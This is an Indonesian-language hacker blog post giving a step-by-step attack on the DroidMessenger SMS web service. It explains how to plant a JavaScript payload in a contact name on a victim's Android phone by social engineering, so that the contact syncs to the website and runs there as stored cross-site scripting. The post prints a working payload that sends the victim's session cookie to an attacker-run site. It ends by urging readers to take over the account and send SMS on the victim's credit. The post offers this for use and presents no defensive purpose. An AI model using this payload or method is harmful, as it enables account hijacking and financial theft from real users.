Exploiting Android Contact Name untuk Mencuri Cookies di DroidMessenger

chmood

Aplikasi Droid Messenger adalah aplikasi yang memungkinkan kita mengirim dan menerima SMS dari website DroidMessenger (www.droidmessenger.com) menggunakan nomor HP Android kita. Aplikasi ini dapat didownload di https://play.google.com/store/apps/details?id=com.android.DroidMessenger&feature=search_result

Pertama ane jelasin dulu fitur apa yang bisa dilakukan aplikasi ini, dan celah apa saja yang bisa manfaatkan dari fitur DroidMessenger ini.

- Mengirim SMS dari website dengan menggunakan nomor HP kita.

Fitur ini bener2 tanpa jejak. Karena sekalinya kita berhasil mendapatkan akun seseorang, kita bisa mengirim SMS kemanapun menggunakan no.HP korban (sekalian sama pulsanya :p ) tanpa diketahui oleh korban, karena tidak ada pemberitahuan di HP.

- Sinkronisasi Kontak

Fitur ini memudahkan pemilik akun untuk mengirim SMS dari kontak yang ada di HP setelah di sinkronisasi. Karena setelah proses sinkronisasi, maka nomor-nomor kontak di HP akan otomatis bisa diakses dari website. Nah, disinilah kita akan melakukan exploit. Melalui nomor kontak :)

Jadi target kita kali ini adalah pengguna Android yang menginstall aplikasi DroidMessenger ini.

perhatikan baris code pada halaman www.droidmessenger.com/messages

<select name="cid">
<option></option>
<option value="10075">Aby</option>
<option value="11801">Abez</option>
<option value="1181">Adi Paaanjaaang</option>
<option value="11789">Ajal_13</option>
<option value="11811">Ami</option>
<option value="9309">Andhy D. Ozan Neighbourhood</option>
<option value="11674">Anggie D. Wawan</option>
<option value="1149">Ant D. Isti</option>
<option value="11667">aphe_aphe</option>
</select>


Bisa kita lihat untuk no.HP nya merupakan ID yang diambil dari database, sedangkan untuk Contact Name nya, sesuai dengan Nama Kontak yang ada di HP. Dari sinilah kita akan melakukan exploitasi. Soceng yang kita lakukan pada HP korban adalah menambahkan sebuah kontak baru. Penamaan kontak tidak kita isi dengan nama biasa, tetapi menggunakan code javascript.

Name : <script>MALICIOUS SCRIPT HERE</script>
Number: 666

agar tidak tampak terlalu mencurigakan, kita tambahkan sebuah nama normal didepannya. Misalnya "ANDIKA <script>MALICIOUS SCRIPT HERE</script>"Oh iya, karena untuk fitur yang FREE disitus ini, sinkronisasi hanya akan mengambil 10 kontak pertama, jadi usahakan nama kontak diawali dengan abjad A, atau menggunakan ANGKA. Intinya biar kontak yang baru kita isi terdapat di 10 kontak pertama. MALICIOUS SCRIPT disini terserah sampeyan ja, kalo cuma pengen show off ke dia, ya tinggal ganti jadi

Oktavia <script>alert('Ur Account Hacked By K4pT3N');</script>


tapi karena disini kita ingin mencuri Cookies-nya, maka script kita ganti jadi

<script>window.location='http://SitusmuBuatNyuriCookies.com/?cookie='+document.cookie;</script>

Setelah korban login ke situs www.droidmessenger.com untuk memanfaatkan fitur sms dari web, list nama kontak yang sudah kita sisipi MALICIOUS SCRIPT kita tadi akan membuka situs pencuri cookies yang sudah kita siapkan sebelumnya. Kemudian kita tinggal melihat log cookies yang telah dikirim ke email kita melalui http://SitusmuBuatNyuriCookies.com ^_^


Kalo dah dapet cookiesnya, ya udah. Tinggal pake cookiesnya buat login, trus sms sepuasnya pake pulsanya si korban. yarp yarp ^_^


./Regards



K4pT3N
Category
Komentar